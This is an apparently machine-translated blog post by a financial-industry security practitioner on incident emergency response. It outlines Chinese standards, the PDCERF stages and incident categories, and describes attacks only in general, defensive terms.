the foundation of network security emergency response of financial enterprises

Posted by punzalan at 2020-03-02

Gartner puts forward the security architecture framework for the next generation adaptive security framework (ASA). The framework emphasizes that security protection is a continuous and cyclic process from four dimensions of prediction, defense, detection and response. It analyzes security threats in a fine-grained, multi angle and continuous way in real time and dynamically, and adapts to the changing network and threat environment automatically and constantly Optimize its own security defense mechanism.

In other words, Gartner believes that the security problems or vulnerabilities of enterprises will inevitably be discovered and exploited by others. How can we respond more effectively? The topic of emergency response is easy to turn into that a machine is hacked to knock on a command to look at the log and check the back door. In fact, there is a lot of knowledge in it.

As for emergency response, first of all, targeted national standards are available for reference, including the following:

GB / T 24363-2009 code for information security emergency response plan

GB / Z 20985-2007 information security incident management guide

GB / Z 20986-2007 guide to classification and classification of information security incidents

For the financial industry, the CBRC has also printed and distributed the guidelines for emergency response of cross industry information systems of banks and securities, etc. In addition, there is a pdcerf model, which divides emergency response into six stages: preparation, detection, containment, eradication, recovery and follow-up, as follows:

Preparation: that is, preparation before the event, including strategy, plan, specification document and specific technical tools and platforms

Detection: preliminary judgment of what type of problem, affected system and severity

Inhibition: limit the scope of attack and damage, commonly known as hemostasis

Eradication: analyze the cause of the incident, thoroughly solve the problem, and avoid making mistakes on the same problem again

Recovery: return business to normal level

Follow up: implement and monitor the rectification measures for the incident, in other words, continuous improvement in safety operation

Secondly, with these standards, models or guidelines, enterprises need to formulate their own emergency response specifications based on their own actual situation, including the classification and classification of events, organization and responsibility, handling process, and even the template of security event analysis and handling results.

GB / z20986-2007 classification guide for information security incidents, according to the causes, manifestations and results of information security incidents, information security incidents are divided into seven basic categories: malicious program incidents, network attack incidents, information destruction incidents, information content security incidents, equipment and facilities failures, disaster incidents and other information security incidents. Each basic category includes several sub categories.

Malicious program events (computer virus events, worm events, Trojan horse events, botnet events, mixed attacker events, webpage embedded malicious code events, other harmful program events)

Network attack events (denial of server attack events, backdoor attack events, vulnerability attack events, network scan eavesdropping events, phishing events, interference events, other network attack events)

Information destruction events (information tampering events, information counterfeiting events, information disclosure events, information theft events, information loss events, other information destruction events)

Information content security incidents (information security incidents in violation of the Constitution and laws, administrative regulations, discussions and comments on social issues, forming sensitive public opinion hot spots on the Internet, information security incidents with certain scale of hype, organization series, information security incidents inciting rallies and processions, and other information content security incidents)

Equipment and facilities failure (software and hardware failure, peripheral support facilities failure, human damage accident, other equipment and facilities failure)

Catastrophic events

Other information security events

Within the enterprise, we tend to contact the first several categories. After combing according to the actual situation and our own understanding, we classify them as follows:

1、 Attacks against Internet applications

Internet applications are most likely to be targeted by hackers due to their open access to the Internet. With the emergence of various automatic scanning tools, the system will monitor various scanning requests every day. The scanner will try various web vulnerability requests such as SQL injection, XSS attack, upload vulnerability, directory traversal, specific file request, etc.; for some login interfaces, hackers will brutally crack Database collision attack: for some URLs or API interfaces, hackers will specifically traverse requests to obtain more information; if they go further into the system, rights, backdoor installation, log cleaning, etc. will occur from time to time; if these fail, hackers may also take DDoS attacks due to interests, etc.

2、 Attacks on Intranet

Employees in enterprises usually have channels such as email, Internet access, U-disk copy to keep in touch with the outside world, and these three points are also easy to be used by external attackers. The email contains malicious files, which will be controlled when the user clicks; the web page that the user may visit will include the vulnerability mount page, and the user will be recruited when he visits; the external person's U disk inserted into the internal computer may also cause the machine to be infected with malicious programs, etc. After the malicious program enters the intranet, it will further explore the network structure and find the most valuable attack target and system. After the target is reached, it may transmit the required information through various means. In recent years, the popular extortion software is more simple and crude, which directly encrypts the user's document data and requires the victim to pay a certain amount of bitcoin to obtain the decryption key.

3、 Information disclosure events from inside

In addition to attacks from the outside, there may be unintentional or intentional information disclosure events by internal employees. For example, in the following case, a document was forgotten on the copying machine and photographed and sent to the circle of friends by employees:

More intentional leaks may be hidden behind, such as the following report:

In fact, Tencent and found that the black production personnel joined and later reported the case. With the deepening of the incident, the blacksmith was exposed to have been employed by a number of Internet companies, and the list of these companies began to spread in the circle.

Event classification mainly depends on the importance of the affected system and the severity of the problem. It is obvious that the core business system, the edge business system and the non business system should be distinguished. It is also completely different to directly obtain the system authority, only obtain the webshell authority, or just like phpinfo information disclosure.


The first stage of pdcerf model is preparation work, including the standard system of emergency response, specific technical tools and platform construction and operation. After the system specification is formulated, it needs to be implemented truly, and the processing efficiency can be improved by simulation exercise. There are differences between technical tools and platforms. Tools are similar to static compiled ls, lsof, PS, netstat and some scripts that can quickly analyze the characteristics of logs and scan files, etc., which will play a role on the target machine. While platforms are centralized logs collected by various security systems on terminals, networks and applications after enterprises deploy FW, NIDS, HIDS, WAF and other systems Send to platform for correlation analysis (such as SoC system).

Detection stage

After an event occurs, it is necessary to judge what the affected system is and what the nature of the event is. This is the detection stage. Based on the preliminary analysis conclusion, different treatment processes are adopted for emergency disposal. For example, if an edge system of the Internet is attacked and has a scanning behavior when it alarms on the SOC system, it may only need the operator to simply refuse, and the enterprise with good security automation may automatically intercept it, without involving in the emergency response process. Further, the edge system alarm has execution sensitive instructions and the parent process belongs to the web application, which may require emergency response personnel to start to handle. However, whether to report or not, and which level to report to, it is estimated that it is only reported to the security supervisor. Furthermore, if the online banking system has a large number of attacks against the database and a customer reports that his account has been locked for many times due to errors, it is certainly not appropriate to report only to the security supervisor. In addition to the understanding of the business, there are also some technical work, such as traffic big alarm, whether it is normal business or publishing or there is an attack, whether the attack is regular DDoS or CC or the machine is controlled to send out the contract; another example is what vulnerability and return address are used after a malicious email is delivered?

Boycott stage

With the above judgment and analysis, we can provide targeted hemostasis measures, that is, the work to be done in the resistance stage. Whether the attack from the external network is to block the source IP or to clean the traffic, whether the attack against the internal network is to block the exit or to interfere in the terminal, are all work at the executive level, daily multi drill, try to automate, will greatly improve the efficiency.


Conduct root cause analysis for the event to locate the real cause. For example, the edge business system mentioned above was taken to webshell. What are the corresponding vulnerabilities? From the log analysis, we try to restore the entire intrusion path, and then find out what vulnerabilities exist, so as to facilitate the next rectification work.


To resume normal business, this process will not be repeated, provided that the problem is effectively solved.


Security incidents often occur, which means that the security system is not perfect or there is failure in the operation process. It is a good opportunity to analyze the root cause of the incidents and find out the defects of the existing security control means. For example, if the front WAF does not intercept and the back trigger the IPS alarm, the WAF strategy can be targeted optimized; for example, if a mobile phone number on a page is not desensitized and found by the outside world, various problems from development, testing to operation and maintenance side can be targeted to be found, and if the information leakage is not effectively monitored in the security operation and maintenance, it is also an improvement point. Finally, are these improvement points implemented to people, deadline and effectiveness? This is what needs to be done at this stage.

Finally, another point has nothing to do with the emergency response itself. In the actual work process, will there be such a scenario: what kind of experience will it be when the supervision receives a loophole about a financial institution and the financial institution itself does not know it at all? Think again, when the senior leaders receive an email from an external security company saying that there are loopholes in your organization that may be exploited by others, they will also be very passive. In addition to their own efforts in security defense technology and operation, they also need to do some other work, such as communication, human relations, intelligence, etc. Internet companies have their own Src. White hat can report and reward vulnerabilities through SRC platform. On the one hand, white hat can find enterprise vulnerabilities and improve enterprise security by virtue of white hat. On the other hand, it can reduce the probability that vulnerabilities are exposed on uncontrollable platforms and thus reduce the passive situation.

(to be continued, Part 2: technical part of emergency response)

Recommended articles with the highest reading volume in the past

Work article:

Information security team building of financial enterprises (Practical)

Construction of information security team in financial enterprises

E-mail security in the practice of enterprise security construction

The road to the safety construction of financial enterprises

Life chapter

Nanyang travel notes

An interesting question


The safety construction of an enterprise can not be separated from "mutual help on the lookout". In the past security incidents and security emergencies, there have been a large number of live broadcasts of the security construction wechat group of financial enterprises. The timeliness and effectiveness of disposal measures have benefited me a lot. If you are interested in joining the company safety leader, please pay attention to WeChat official account "Jun brother's body calendar", background messages, micro signals + company names, and verify identity after entering the group.

Note appended:

Nie Jun, an information security practitioner, has more than ten years of experience in information security in the financial industry. Good reading, no understanding. Cheerful personality, like football.

This subscription number article is a personal experience and experience sharing of work and life. Reading from different perspectives and positions will lead to deviation, different opinions, not seeking correct unity, but seeking truth, goodness and beauty.

Long press identification QR code to communicate with me


Appreciation is recognition or affirmation, and more original sharing is encouraged

Please "like" here for me, thank you.